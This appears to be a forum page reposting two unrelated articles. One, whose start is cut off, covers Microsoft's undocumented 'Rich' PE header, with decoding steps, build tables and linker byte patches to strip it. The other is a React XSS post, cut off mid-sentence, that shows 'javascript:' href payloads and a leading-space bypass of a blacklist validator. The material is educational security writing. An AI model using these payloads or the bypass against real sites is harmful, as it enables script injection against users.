checksum if you alter any bytes in the file; although this is not necessary if the checksum field is zero (disabled). Automated removal is possible through the peupdate tool. More recently, I found that Microsoft's editbin (in version 7.x and up) will also zero-out the "Rich" structure using the undocumented /nostub switch however this also removes the PE header offset from the DOS header effectively breaking the executable. Using editbin is therefore not recommended. Other removal options are discussed in the section, Patching the Microsoft Linker below. In the KERNEL32.DLL sample above, the DWORD following the "Rich" sequence happens to have the value 0xF94EE753. This is the XOR key stored by and calculated by the linker. It is actually a checksum of the DOS header with the e_lfanew (PE header offset) zeroed out, and additionally includes the values of the unencrypted "Rich" array. Using a checksum with encryption will not only obfuscate the values, but it also serves as a rudimentary digital signature. If the checksum is calculated from scratch once the values have been decrypted, but doesn't match the stored key, it can be assumed the structure had been tampered with. For those that go the extra step to recalculate the checksum/key, this simple protection mechanism can be bypassed. To decrypt the array, start with the DWORD just prior to the "Rich" sequence and XOR it with the key. Continue the loop backwards, 4 bytes at a time, until the sequence "DanS" (0x536E6144) is decrypted. This value marks the start of the structure, and in practice always seems to reside at offset 0x80. I think a lot of tools that parse the "Rich" structure rely on it starting at offset 0x80. I'd personally recommend against relying on this fact and parsing backwards from the "Rich" signature as described above to handle situations where this may not be the case. Since this is an undocumented structure, I think its best to avoid any assumptions such as hardcoded offsets, especially since you must search for the signature "Rich" anyway. With that said, I have yet to encounter an executable where offset 0x80 is not the start; that is, if the structure is present at all. Following the decoding procedure using the KERNEL32.DLL sample shown above, we end up with following "Rich" structure where all values have been decrypted, and the array is listed beginning at offset 0x80 in ascending order: OFFSET DATA ------ ---------- 0080 0x536E6144 //"DanS" signature (decrypted) / START MARKER 0084 0x00000000 //padding 0088 0x00000000 //padding 008C 0x00000000 //padding 0090 0x00010000 //1st id/value pair entry #1 0094 0x0000018A //1st use count id1=0,uses=394 0098 0x005D0FC3 //2nd id/value pair entry #2 009C 0x00000003 //2nd use count id93=4035,uses=3 00A0 0x005C0FC3 //3rd id/value pair entry #3 00A4 0x00000001 //3rd use count id92=4035,uses=1 00A8 0x005E0FC3 //4th id/value pair entry #4 00AC 0x00000001 //4th use count id94=4035,uses=1 00B0 0x000F0FC3 //5th id/value pair entry #5 00B4 0x00000005 //5th use count id15=4035,uses=5 00B8 0x005F0FC3 //6th id/value pair entry #6 00BC 0x000000DD //6th use count id95=4035,uses=221 00C0 0x00600FC3 //7th id/value pair entry #7 00C4 0x00000004 //7th use count id96=4035,uses=4 00C8 0x005A0FC3 //8th id/value pair entry #8 00CC 0x00000001 //8th use count id90=4035,uses=1 00D0 0x68636952 //"Rich" signature END MARKER 00D4 0xF94EE753 //XOR key The array stores entries that are 8-bytes each, broken into 3 members. Each entry represents either a tool that was employed as part of building the executable or a statistic. You'll notice there are some zero-padded DWORDs adjacent to the "DanS" start marker. In practice, Microsoft seems to have wanted the entries to begin on a 16-byte (paragraph) boundary, so the 3 leading padding DWORDs can be safely skipped as not belonging to the data. Each 8-byte entry consists of two 16-bit WORD values followed by a 32-bit DWORD. The HIGH order WORD is an id which indicates the entry type. The LOW order WORD contains the build number of the tool being represented (when applicable), or it may be set to zero. The next DWORD is a full 32-bit "use" or "occurrence" count. THE ID VALUE: The id value indicates the type of the list entry. For example, a specific id will represent OBJ files generated as a result of the use of a specific version of the C compiler. Different ids represent other tools that were also employed as part of building the final executable, such as the linker. Daniel Pistelli's article, Microsoft's Rich Signature (undocumented), found that the id values are a private enumeration that change between releases of Visual Studio. I have also found this to be the case, which unfortunately makes them a bit of a moving target to decipher. Besides a couple exceptions which I'll explain below, the id is emitted by each compiler (or assembler) and is stored within each OBJ (and thus LIB) files linked against in the form of the "@comp.id" symbol. The "@comp.id" symbol happens to be short for "compiler build number" and "id". In fact, the DWORD value stored as the "@comp.id" symbol is the same DWORD being stored in the first half of applicable "Rich" list entries. I say applicable because not all list entries represent OBJ files. Some ids can appear more than once in the list, while others do not. The id typically represents the following statistics: OBJ count for specific C compiler (cl.exe) OBJ count for specific C++ compiler (cl.exe) OBJ count for specific assembler (ml.exe) specific linker that built module (link.exe) specific resource compiler (rc.exe), when RES file linked imported functions count MSIL modules PGO Instrumented modules and so on... Most of the entries above have an associated build number of the tool being represented, such as the compiler, assembler and linker. One exception to this is the imported functions count, which happens to be the total number of imported functions referenced in all DLLs. This is usually the only entry with a build number of zero. Note that the "Rich" structure does not store information on the number of static/private functions within each OBJ/source file. The linker entry is always last in the list and represents the linker that built the module. The resource compiler, when present, is almost always 2nd to last in the list; next to the linker. Both the linker and resource compiler are represented by a hardcoded id and build values for each linker release. For example, when a resource script is employed, the linker uses the same id/build pair even if the RES is built from a resource compiler from another version of Visual Studio! Another oddity is the build value of the resource compiler entry typically does not match the build reported by the rc.exe command line. The correlation of unique build values to specific versions of Visual Studio tools is discussed in more detail below. The linker seems to build most "Rich" structures in the following order, though not necessarily in the order appearing on the command line: Entries representing LIB files Entries representing individual OBJ files Resource Compiler Linker At first glance you might guess that each referenced LIB file would represent one entry in the list, but this is not the case. The linker may may generate one or more entries for each LIB file depending on the number of unique "@comp.id" values found within. Since a LIB file is not much more than a concatenation of OBJ files, the resulting "count" member of these entries are the number of OBJ files referenced in the final executable that contain that exact "@comp.id" value. For example, statically linking to the Standard C Library usually generates assembler and C OBJ entries because that is what constitutes the source files internally used by Microsoft to build LIBCMT.LIB. When you link against this library, the unique "@comp.id" value-pairs are tallied together and the resulting counts are written to the list. With that in mind, the "Rich" structure in KERNEL32.DLL can be annotated as follows: id1=0,uses=394 id93=4035,uses=3 id92=4035,uses=1 id94=4035,uses=1 id15=4035,uses=5 id95=4035,uses=221 id96=4035,uses=4 id90=4035,uses=1 394 imports ??? ??? 1 rc script 5 asm sources 221 C sources 4 C++ sources Linker Here's another annotated example derived from a minimal C++ application linked with a resource script and the Standard C Library built from Visual C++ 7.1: id15=6030,uses=20 id95=6030,uses=68 id93=2067,uses=2 id93=2179,uses=3 id1=0,uses=3; id96=6030,uses=1 id94=3052,uses=1 id90=6030,uses=1 20 asm sources 68 C sources ??? ??? 3 imports 1 C++ source 1 rc script Linker Below is my attempt at a partial list of decoded ids from the version 6 and 7 Visual Studio toolsets based on a little trial and error. Note that many of the ids originate from the LIB files bundled with with the associated Visual C++ SDK versions, as the linker only hardcodes a few of the entries at the end of the list. It is also common to see a reference to MASM even when MASM is not utilized directly by a project as these references are pulled in automatically by the linker or SDK LIB files. Microsoft Visual Studio 6.0 SP6 ID MEANING 1 total count of imported DLL functions referenced; build number is always zero 4 seems to be associated when linking against Standard C Library DLL 19 seems to be associated when statically linking against Standard C Library 6 resource compiler; almost always last in list (when RES file used) and use-count always 1 9 count of OBJ files for Visual Basic 6.0 forms 13 count of OBJ files for Visual Basic 6.0 code 10 count of C OBJ files from specific cl.exe compiler 11 count of C++ OBJ files from specific cl.exe compiler 14 count of assembler OBJ files originating from MASM 6.13 18 count of assembler OBJ files originating from MASM 6.14 42 count of assembler OBJ files originating from MASM 6.15 Microsoft Visual Studio 7.1 SP1 ID MEANING 1 total count of imported DLL functions referenced; build number is always zero; same as in Linker versions 5.0 SP3 and 6.x 15 count of assembler OBJ files originating from MASM 7.x 90 linker; always present and always at end of list; use-count always 1 93 Always seems to be present no matter how the executable was built, but doesn't appear to originate from @comp.id symbols (???) 94 resource compiler; almost always 2nd to last in list (when RES file used) and use-count always 1 95 count of C OBJ files from specific cl.exe compiler 96 count of C++ OBJ files from specific cl.exe compiler Not only do the ids change with each major linker release (sometimes with service packs too), but newer versions of the SDK's LIB files use different and higher id numbers for the same thing, such as the C and C++ compiler. So not only do the build numbers change with each SDK, but the id identifying the type of entry also changes. Unless the idea is to make the header difficult to interpret, the id may be meant to be combined with the build number to provide a unique compiler-that-built-SDK instance statistic which could be used to trace leaked or BETA versions of tools or SDKs. The whole system might also double as another check system, where if the tool ids and reported build versions don't match known publicly released pairs, this would be another indication the entries in the list were tampered with. Without any official word from Microsoft, some of this is pure speculation. The good news is that if you are only interested in detecting modern versions of Visual Studio (7.x and up), the id member can be completely ignored! More information about detection is presented below. WHEN DID MICROSOFT INTRODUCE THE "RICH"-ENABLED LINKER? The short answer is in 1998, with Visual Studio 6.0 (LINK 6.x). The long answer is the final Service Pack for Visual Studio 5.0; that is, the version 5.10.7303 linker introduced with SP3 in 1997 was the first "Rich" capable linker. The catch was that the list this linker produced was practically empty because the compilers at the time (e.g. Visual C++ 5.x, MASM 6.12) did not yet emit the "@comp.id" symbol to the OBJ files. Not surprisingly, the LIB files that shipped with the product's SDK were also missing the "@comp.id" symbol. The result was a "Rich" structure with either a single entry for the imports, or with an additional entry to represent a compiled resource script. If you however link a Visual C++ 6.0 OBJ file with the older 5.0 SP3 (5.10.7303) linker, you will get a proper "Rich" structure because the 6.0 OBJ file contained the "@comp.id" symbol with build information. The 6.0 OBJ files were however incompatible the 5.0 SP2 and earlier linkers; if you attempted to link-in any of these modules using the older linkers, you would run in to error: LNK1106: "invalid file or disk full: cannot seek to 0xXXXXXXXX". This is an indication that in 1997, Microsoft changed the OBJ file format. In summary, the Visual C++ 5.0 SP3 linker and the linker that would be released next with Visual C++ 6.0, both supported a new type of OBJ file. Specifically, the OBJ files that would facilitate the generation of the this new "Rich" structure. CHANGELIST: PRODUCT VERSION YEAR CHANGE Visual Studio 97 (5.0) SP3 1997 First linker capable of producing "Rich" header and supporting new OBJ format to be released with the not-yet-public VC++ 6.0 compiler (cl.exe 12.x); however compiler's at the time did not yet support writing "@comp.id" to OBJ files so the list had minimal information Visual Studio 6.x 1998 Microsoft compilers, including Visual Basic now support writing "@comp.id" symbol to OBJ files; bundled SDK LIB files now contain "@comp.id" build information; as a result, executables built using the Visual C++ 6.0 compiler and linker now get the first "proper" "Rich" headers. Visual Studio 7.0 .NET (2002) 2002 Linker now appends its own entry to the list and is always last; fortunately we now have a predictable entry that is retained in future versions BUILD NUMBERS FOR DETECTION: Before continuing further, I want to stress an important point. There is little preventing someone from either tampering with or completely falsifying the "Rich" header. While this structure may provide useful information for the majority of executables, other signature methods should be utilized in conjunction where accuracy is paramount. Some of these methods may include searching for specific patterns in the headers and/or analysis of the entry-point code. For example the Borland and Watcom linkers can be identified by specific patterns unique to each from their DOS stubs. The presence of a "Rich" header, or lack thereof, doesn't mean Microsoft's linker cannot be detected by other clues. A typical version number for a Microsoft product consists of major and minor numbers (one byte each) followed by a 16-bit build number and sometimes another 16-bit sub-version number. Since we primarily have the build number for each "Rich" entry to go by, how might we distinguish a specific version of Visual Studio from this information? There are at least 3 ways: The MajorLinkerVersion and MinorLinkerVersion members of the PE's OptionalHeader can be combined with the last entry in the "Rich" list (if MajorLinkerVerion >= 7) to construct the full version of the linker. Once the linker is known, one can assume the version of Visual Studio including that linker was responsible for building the executable even if not all inputs came from this version. The build numbers for each release of Visual Studio are almost completely unique which allow build numbers to identify a specific version of the toolset used; that is for id's besides the linker. The one exception I'm aware of is build number 50727. This build number was issued to public releases of both Visual Studio 2005 and 2012. As mentioned above, you might make the distinction by checking the PE MajorLinkerVersion and testing it for 8 and 11 respectively to at least determine the full version of the linker. Because the entry type ids change between releases of Visual Studio, the id in combination with the build number can be used to uniquely identify a version of Visual Studio. Based on the information above, if you want to detect versions of Visual Studio 7.0 and up, things couldn't be easier. If the MajorLinkerVersion in the PE's OptionalHeader is 7 or greater, indicating Visual Studio .NET 7.0 (2002) and up, the last entry in the list always represents the linker that built the module. If that build number corresponds to a known version of Visual Studio, you might consider it safe to assume the compiler is also from the same toolset. As for versions of Visual Studio supporting the "Rich" structure prior to 7.0, the detection rules were a little different because no linker entry was written to the end of the "Rich" list. Perhaps Microsoft figured it was enough that the PE header contained the Major and Minor version for the linker and the build number was not important enough to include. It is interesting to note that the id and build versions embedded within the publicly shipped SDK LIB files are those of non-public releases of Microsoft compilers; this makes sense because Microsoft builds its SDKs internally, but this happens to be a good thing for detection. This allows us to distinguish the SDK's compiler id/build pairs from those pairs that represent the compilers responsible for building the executable. In other words, if you know where the linker entry is and the entries that represent the SDK LIB files because they are not recognized public versions (see table below), the only thing left are the compiler entries we want to use for detection! You will then be able to determine the language used to build an executable, whether it be C, C++, MASM or all in combination in addition to the toolset version of each. All of this is assuming you want to use the build numbers alone for detection rather than hardcoding the differing tool ids per version of Visual Studio to combine with the build numbers. Going back to the KERNEL32.DLL example above, we can see the last entry's build number is 4035 which corresponds to one of the known public Microsoft 7.1 linkers. Using a lookup table, such as that shown below, applications can use this information to correlate [mostly] unique build numbers to known Microsoft Visual Studio toolsets. MASM 6.x BUILDS BUILD PRODUCT VERSION 7299 6.13.7299 8444 6.14.8444 8803 6.15.8803 Visual Basic 6.0 BUILDS BUILD PRODUCT VERSION 8169 6.0 (also reported with SP1 and SP2) 8495 6.0 SP3 8877 6.0 SP4 8964 6.0 SP5 9782 6.0 SP6 (same as reported by VC++ but different id) VISUAL STUDIO BUILDS BUILD PRODUCT VERSION CL VERSION LINK VERSION 8168 6.0 (RTM, SP1 or SP2) 12.00.8168 6.00.8168 8447 6.0 SP3 12.00.8168 6.00.8447 8799 6.0 SP4 12.00.8804 6.00.8447 8966 6.0 SP5 12.00.8804 6.00.8447 9044 6.0 SP5 Processor Pack 12.00.8804 6.00.8447 9782 6.0 SP6 12.00.8804 6.00.8447 9466 7.0 2002 13.00.9466 7.00.9466 9955 7.0 2002 SP1 13.00.9466 7.00.9955 3077 7.1 2003 13.10.3077 7.10.3077 3052 7.1 2003 Free Toolkit 13.10.3052 7.10.3052 4035 7.1 2003 13.10.4035 (SDK/DDK?) 6030 7.1 2003 SP1 13.10.6030 7.10.6030 50327 8.0 2005 (Beta) ? ? 50727 (linkver 8.x) 8.0 2005 14.00.50727.42 14.00.50727.762 SP1? 21022 9.0 2008 15.00.21022 30729 9.0 2008 SP1 15.00.30729.01 30319 10.0 2010 16.00.30319 40219 10.0 2010 SP1 16.00.40219 50727 (linkver 11.x) 11.0 2012 17.00.50727 51025 11.0 2012 17.00.51025 51106 11.0 2012 update 1 17.00.51106 60315 11.0 2012 update 2 17.00.60315 60610 11.0 2012 update 3 17.00.60610 61030 11.0 2012 update 4 17.00.61030 21005 12.0 2013 18.00.21005 30501 12.0 2013 update 2 18.00.30501 40629 12.0 2013 SP5 18.00.40629 SP5 22215 14.0 2015 19.00.22215 Preview 23506 14.0 2015 SP1 19.00.23506 SP1 23824 14.0 2015 update 2 (unverified) 24215 14.0 2015 19.00.24215.1 (unverified) NOTE: The table above was compiled from various sources; it is not an exhaustive list. BUILD NUMBERS DON'T ALWAYS MATCH REPORTED COMMAND LINE/ VERSION RESOURCE VALUES! As you can see, the build numbers don't always correspond to what is reported from the command line. For example cl.exe for Visual C++ 6.0 reports version 12.00.8804 for Service Packs 4 thru 6, however the "@comp.id" value written to OBJ files is different for each service pack, such as 8799,8966,9044, and 9782 for SP4, SP5, SP5 (Processor Pack) and SP6 respectively. You can see the same pattern in Visual C++ 7.x. This allows for unique detection for each Service Pack. PATCHING THE MICROSOFT LINKER: Rather than using a tool (such as peupdate) to remove the "Rich" header on a per-executable basis, it is possible to "fix" the linker so that the "Rich" header is never written in the first place. It wasn't long between the "Rich" header's discovery gone public and the appearance of a linker patch to prevent the structure from being written to the executable. This is a cleaner solution than manually zeroing-out each executable produced, however a new patch is needed for each version of the linker. As an added bonus, patching reclaims the area originally occupied by the "Rich" header (usually offset 0x80) as the spot where the PE header will instead be placed. This can reduce the size of the executable depending on the file alignment value passed to the linker. In August of 2005, there was a PE tutorial written by Goppit that briefly describes using a tool called Signature Finder to patch the Linker. This is a simple GUI tool that when supplied the path to LINK.EXE, locates the RVA address of the CALL instruction for the routine which generates the "Rich" Header. Knowing where the "Rich" routine is invoked by the linker is the first step; how to patch is up to you. However the traditional patch method is to NOP-out the ADD instruction following the CALL. To do this, load LINK.EXE in a disassembler or debugger and navigate to the location reported by the tool (adding a 0x400000 base address to the reported RVA). If you have symbols loaded, you'll see disassembly similar to the following within the IMAGE::BuildImage() function: 0045F0A5 E8 56 45 FC FF call ?UpdateCORPcons@@YGXXZ ; UpdateCORPcons(void) 0045F0AA 55 push ebp ; struct IMAGE * 0045F0AB E8 30 D2 01 00 call ?UpdateSXdata@@YGXPAVIMAGE@@@Z ; UpdateSXdata(IMAGE *) 0045F0B0 8D 54 24 14 lea edx, [esp+448h+lpMem] 0045F0B4 52 push edx 0045F0B5 55 push ebp 0045F0B6 E8 45 A6 FF FF call ?CbBuildProdidBlock@IMAGE@@AAEKPAPAX@Z ; IMAGE::CbBuildProdidBlock(void**) <--- BUILDS the "Rich" Header 0045F0BB 8B 8D 3C 02 00 00 mov ecx, [ebp+23Ch] 0045F0C1 03 C8 add ecx, eax ; <--- NOP this out! 0045F0C3 89 44 24 2C mov [esp+448h+var_41C], eax 0045F0C7 89 8D 40 02 00 00 mov [ebp+240h], ecx 0045F0CD FF 15 BC 12 40 00 call ds:__imp___tzset The "Rich" Header routine identified by the tool is named CbBuildProdidBlock(); we can now assume Microsoft internally refers to the "Rich" structure as the "Product ID Block". If the ADD instruction below it (address 0x45F0C1) is changed from bytes "03 C8" to "90 90" (NOPs), the linker still internally generates the structure, but because we've removed the instruction that advances the current file position, the PE header (which comes next in the image) overwrites the "Rich" structure. Problem solved, no information leak. If you don't want to run the Signature Finder tool, below is a table with patch address information for all of the publicly-released 6.xx and 7.xx Microsoft linkers. The location is for the "ADD ECX,EAX" instruction (bytes "03 C8"). To perform the patch, replace the ADD instruction with two NOP bytes ("90 90"). This can be done with the bytepatch tool using the following command line: bytepatch -pa <address> link.exe 90 90 Replace <address> above with the value in the ADDRESS column below on whatever linker you are using. VERSION SHIPPED WITH MD5 SIZE ADDRESS FILE OFFSET LINK.EXE 6.00.8168 MSVC 6.0 RTM,SP1,SP2 7b3d59dc25226ad2183b5fb3a0249540 462901 0x44551A 0x4551A LINK.EXE 6.00.8447 MSVC 6.0 SP3,SP4,SP5,SP6 24323f3eb0d1afa112ee63b100288547 462901 0x445826 0x45826 LINK.EXE 7.00.9466 MSVC .NET 7.0 (2002) RTM dbb5bf0ce85516c96a5cbdcc3d42a97e 643072 0x45CD82 0x5CD82 LINK.EXE 7.00.9955 MSVC .NET 7.0 (2002) SP1 2042a0f45768bc359a5c912d67ad0031 643072 0x45CD32 0x5CD32 LINK.EXE 7.10.3052 MSVC .NET Free Toolkit 8d7a69e96e4cc9c67a4a3bca1b678385 647168 0x45EA0F 0x5EA0F LINK.EXE 7.10.3077 MSVC .NET 7.1 (2003) 4677d4806cd3566c24615dd4334a2d4e 647168 0x45EA0F 0x5EA0F LINK.EXE 7.10.6030 MSVC .NET 7.1 (2003) SP1 59572e90b9fe958e51ed59a589f1e275 647168 0x45F0C1 0x5F0C1 Unfortunately, the Signature Finder tool only works with Microsoft linkers prior to and including Visual Studio .NET 7.1 (2003). RE Analysis of the tool indicates that it searches up to 4 possible linker signatures (all known linkers available at the time of the tool's release in 2004), so trying to patch a newer linker such as the one that shipped with MSVC .NET 8.0 (2005), results in an error. However, manually finding the location using a disassembler is not difficult. I received an e-mail from icestudent with a method he uses to manually patch each Microsoft linker release from 8.0 and up. Here is a break-down of this method: Ensure your symbol path is set correctly; then download symbols for the linker you want to patch; e.g.: symchk /v LINK.EXE open LINK.EXE with IDA Pro Open the imports window, locate "_tzset", and go to it Open the references for "_tzset" (CTRL-X) and go to the "IMAGE::BuildImage" reference (or the "IMAGE::GenerateWinMDFile" for CLR executables). Around the "CALL _tzset" instruction, locate the "CALL IMAGE::CbBuildProdidBlock" instruction. In older versions of the linker it was closer and above "_tzset", in modern versions it is below and quite far. If you don't have symbols, check for all CALL instructions around "_tzset" and find the one where the referenced function begins with a call to "HeapAlloc"; this will be the "IMAGE::CbBuildProdidBlock()" function. After the "CALL IMAGE::CbBuildProdidBlock", you will see some code like "MOV reg, ...", "ADD reg, reg2", "MOV [mem], reg". NOP-out the second ADD instruction (or sometimes LEA) which is responsible for adjusting the PE offset in memory past the Rich signature. If you don't use the method above, the table below contains the patch offsets for some post MSVC 7.x linkers. Thanks goes to icestudent for this information! 32-BIT LINK.EXE x86 VERSION OFFSET ORIGINAL BYTES PATCH BYTES 8 SP1 0x6A382 03 D0 90 90 9 RTM 0x6A20F 03 C8 90 90 9 SP1 0x6BE7F 03 C8 90 90 10 B1 0x6CF50 03 C8 90 90 10 B2 0x75EED 03 D0 90 90 10 CTP 0x6C26D 03 C8 90 90 10 SP1 0x760AD 03 D0 90 90 11 RTM U1 0x235BF 03 CE 90 90 11 RTM 0x17AEF 03 CE 90 90 vc18 CTP2 0x31920 03 CB 90 90 vc18 PREVIEW 0x1B3D8 03 CF 90 90 vc18 RC1 0x27B43 03 CF 90 90 vc18 RTM 0x31168 03 CB 90 90 64-BIT LINK.EXE x64 VERSION OFFSET ORIGINAL BYTES PATCH BYTES 8 RTM 0x8157A 93 8B 8 SP1 0x80DAC 93 8B 9 RTM 0x78205 93 8B 9 SP1 KB 0x78CE1 8D 14 0E 90 90 90 9 SP1 0x78CE5 93 8B 10 B1 0x7A01F 93 8B 10 B2 0x7A09D 93 8B 10 SP1 0x7A06D 93 8B 11 RTM U1 0x136B5 03 D0 90 90 11 RTM 0x136B5 03 D0 90 90 vc18 CTP2 0xE22A 03 D0 90 90 vc18 PREVIEW 0x853D 03 D0 90 90 vc18 RC1 0xE684 03 D0 90 90 vc18 RTM 0xEF3A 03 D0 90 90 To patch using the offsets in the table above, use the following bytepatch command line, replacing <file-offset> and <patch-bytes> with the appropriate entry: bytepatch -a <file-offset> link.exe <patch-bytes> CONSPIRACY THEORIES: When the public first became aware of the "Rich" header, the obvious encryption of this structure of unknown information made a lot of people nervous and suspicious. Because Microsoft never officially confirmed the existence of this structure, their lack of transparency made a lot of developers assume the worst. Here you can have an identical-source program built on two different machines and end up with a slightly different executable because the information contained within the "Rich" header was different. It is not surprising that people assumed Microsoft was embedding machine or otherwise personally identifiable information within the structure. These might include a NIC/MAC address, a CPU identifier, Windows registration information or even a unique GUID representing a particular installed instance of a Microsoft product or operating system. In reality, the only thing stored here are the build numbers for the Microsoft-specific tools responsible for a specific component in an executable module. The slightest difference in Visual Studio version, SDK version or 3rd party libraries used will cause an alteration of the "Rich" header. The PE/COFF specification defines a minimum file alignment of 512 bytes. Since this value leaves more than enough room for an executable's header section to fully contain the DOS and PE headers, there will always be leftover wasted space between the headers section and the subsequent section. Microsoft capitalized on this fact by inserting the "Rich" header in the padding space, since it wouldn't generally affect the final executable size one way or the other. To Microsoft's credit, the "Rich" header offers invaluable debugging statistics about how a given executable was built. Because the Visual C/C++ compiler and linker command lines are probably among the most complex command lines of any of Microsoft products to date, not to mention the different versions of those tools available and combinations of SDKs that can be used, a structure such as the "Rich" header being embedded within every executable could certainly save countless man hours in debugging complex build environment problems. Did I mention Microsoft's internal build environment is among the most complex in the world? If Microsoft's case against the author of a virus hinged on the virus being created by a particular version of Visual Studio that matched the version on a confiscated machine, I guess the "Rich" header could be used as evidence to prove this fact but probably not much more. There are other useful reasons Microsoft might want to bury such a secret "fingerprint" within executables. If Microsoft could prove which versions of certain libraries were employed, this would help them to assert intellectual property rights or even a redistribution license violation as they could distinguish between public, beta and pre-release versions. If companies used beta versions of Microsoft tools or libraries to release executables to the public outside of a specific time period, Microsoft would now have a way to find out. The "Rich" header could also help ensure publicly released benchmark tests were done fairly on properly built, Microsoft-sanctioned executables. These reasons could have been a bigger deal at the time the "Rich" header was invented than they are today. The problem was that Microsoft intentionally hid and encrypted this information. Since the structure doesn't officially exist, there isn't going to be an official way to disable it. Anyone who develops with Microsoft tools gets this structure crammed in their executable whether or they like it or not. Failing to document this fact can be considered a questionable practice. However, once people realized Microsoft wasn't embedding personally identifiable information in their executables, the "Rich" header was no longer the hot topic it once was. ORIGINS OF "RICH" AND "DANS" SEQUENCES: According to a 2012 post on Daniel Pistelli's RCE Cafe blog, information from two people who claimed to have worked on the Microsoft Visual C++ team said the word "Rich" likely originated from "Richard Shupak", a Microsoft employee who worked in the research department and had a hand in the Visual C++ linker/library code base. NOTE: Richard Shupak is listed as the author at the top of the file PSAPI.H in the Platform SDK. The PSAPI library (The NT "Process Status Helper" APIs) retrieves information about processes, modules and drivers. "DanS" was likely attributed to employee "Dan Spalding" who presumably ran the linker team. I can vouch for the fact that there was a "Dan Spalding" employee working on the Visual C++ team around the turn of the century. Apparently their initials also show up in the MSF/PDB format! CONCLUSION AND REFERENCES: The first known public information about this structure goes back to at least July 7th, 2004 from the article, Things They Didn't Tell You About MS LINK and the PE Header, a loose specification authored by "lifewire". I've archived the article here, because it is no longer available at one of the original links. While the article was brief, it was densely packed with useful details, such as the layout of the "Rich" structure and how the checksum key is calculated. It is not mentioned how the author came to know such information, but information like this is usually leaked or derived from reverse engineering. At the end of the article, he attributes the "Dan^" sequence as being a reference to Microsoft employee "Dan Ruder", but the sequence was actually and has always been "DanS", so I think this conclusion is incorrect. When I was writing the pelook tool and was looking to add minimal compiler signature detection, I initially stumbled upon Daniel Pistelli's excellent 2008 article, titled Microsoft's Rich Signature (undocumented). This article describes what he discovered while reverse engineering Microsoft's linker. Pistelli's research was independent of lifewire's 2004 article which was unknown to him at the time. Despite this, he arrived at the same conclusion. Pistelli's article was the first I'd heard of such a structure. I was surprised to learn of its existence and that it had been right under my nose all of those years. I was even more surprised that further information (official or unofficial) was not available. My goal in writing this article was to fill in some of the gaps of information not previously available, such as how far back Microsoft's linker had support for the "Rich" structure and how it changed between different versions of Visual Studio. Other links I found useful: A tutorial from 2010 that was based off of the original "lifewire" article. A posting on asmcommunity A posting on trendystephen <END OF ARTICLE> Sursa: http://bytepointer.com/articles/the_microsoft_rich_header.htm
-
- 1
-
-
Ron Perris Apr 15 Avoiding XSS in React is Still Hard Introduction I’ve spent the last few weeks thinking about React from a secure coding perspective. Since React is a library for creating component based user interfaces, most of the attack surface is related to issues with rendering elements in the DOM. The smart folks over at Facebook have handled this by building automatic escaping into the React DOM library code. Built-in Escaping is Limited The escaping code in React DOM works great when you are passing a string value into [...children] . Notice the other two arguments to React.createElement type and [props], values passed into them are unescaped. // From https://reactjs.org/docs/react-api.html#createelement React.createElement( type, [props], [...children] ) Data Passed as Props is Unescaped When you pass data into a React element via props, the data is not escaped before being rendered into the DOM. This means that an attacker can control the raw values inside of HTML attributes. A classic XSS attack is to put a URL with a javascript: protocol into the href value of an anchor tag. When a user clicks on the anchor tag the browser will execute the JavaScript found in the href attribute value. // Classic XSS via anchor tag href attribute. <a href="javascript: alert(1)">Click me!</a> This classic XSS attack still works in React when rendering a component with React DOM. // Classic XSS via anchor tag href attribute in a React component. ReactDOM.render( <a href="javascript: alert(1)">Click me!</a>, document.getElementById('root') ) Mitigating XSS Attacks on React Props There are a few options for mitigating attacks on React components. You could do contextual escaping for the prop value. You would need a list of known bad values for each attribute and you would need to know which characters to escape to make the value benign. Historically this hasn’t gone very well. You could also try filtering, which also hasn’t gone very well in the past. For prop values you probably want to use validation. Here is a common attempt at avoiding XSS with blacklist style validation. const URL = require('url-parse') const url = new URL(attackerControlled) function isSafe(url) { if (url.protocol === 'javascript:') return false return true } isSafe(URL('javascript: alert(1)')) // Returns false isSafe(URL('http://www.reactjs.org')) // Returns true This approach seems to be working, but as we will see shortly it will only prevent simple attacks that don’t attempt to evade the blacklist. Validating Against a Blacklist is Hard In the example above we are doing a lot of things right. We are using the npm module called url-parse to parse the URL instead of hand-rolling a solution. We are attempting to validate the url with an isolated reusable function, so that our security audits and remediation tasks will be easier. We are handling the failure case first in the function and using an early return strategy to handle a failure. It is usually a bad idea to use blacklists to enforce validation. Here we can defeat the isSafe function using our spacebar. const URL = require('url-parse') function isSafe(url) { if (url.protocol === 'javascript:') return false return true } isSafe(URL(' javascript: alert(1)')) // Returns true isSafe(URL('http://www.reactjs.org')) // Returns true Reading npm Module Documentation is Hard (Not Joking) The reason that isSafe(URL(' javascript: alert(1)')) doesn’t work as intended in our isSafe function is described in the documentation page for url-parse over on npm. baseURL (Object | String): An object or string representing the base URL to use in case urlis a relative URL. This argument is optional and defaults to location in the browser. So when we pass the string javascript: alert(1) with a leading space I think url-parse assumes we are providing a relative URL and it is happy to assume the protocol from the browser’s location. In this case it believes the protocol for javascript: alert(1) is http:. const URL = require('url-parse') URL(' javascript: alert(1)').protocol // Returns http: If we look further down in the documentation for url-parse on npm we will find this part. Note that when url-parse is used in a browser environment, it will default to using the browser's current window location as the base URL when parsing all inputs. To parse an input independently of the browser's current URL (e.g. for functionality parity with the library in a Node environment), pass an empty location object as the second parameter: It tells us that if we pass an empty location object as the second parameter to instances of url-parse we can disable the behavior that is causing all strings to be treated as having the browser’s location protocol as their protocol. const URL = require('url-parse') URL(' javascript: alert(1)', {}).protocol // Returns "" With an empty object as the second argument we can see that we get an empty string back as the protocol for javascript: alert(1) . Fixing that Blacklist Function Looking back at the isSafe(url) blacklist function we can improve it by looking for empty strings in addition to the javascript: protocol. const URL = require('url-parse') const url = new URL(attackerControlled) function isSafe(url) { if (url.protocol === 'javascript:') return false if (url.protocol === '') return false return true } isSafe(URL('javascript: alert(1)', {})) // Returns false isSafe(URL('http://www.reactjs.org')) // Returns true Oh yeah, this is a post about React XSS security. Let’s get back to that now. We can try to use our improved isSafe function to do some validation in a React component. import React, { Component } from 'react' import ReactDOM from 'react-dom' import URL from 'url-parse' class SafeURL extends Component { isSafe(dangerousURL, text) { const url = URL(dangerousURL, {}) if (url.protocol === 'javascript:') return false if (url.protocol === '') return false return true } render() { const dangerousURL = this.props.dangerousURL const safeURL = this.isSafe(dangerousURL) ? dangerousURL : null return <a href={safeURL}>{this.props.text}</a> } } ReactDOM.render( <SafeURL dangerousURL=" javascript: alert(1)" text="Click me!" />, document.getElementById('root') ) This example above is not injectable, maybe. Whitelist Validation I’ve never feel very comfortable with blacklist based solutions for security. It would be like if you heard a noise in your house at night and went downstairs to find an unfamiliar person standing in your 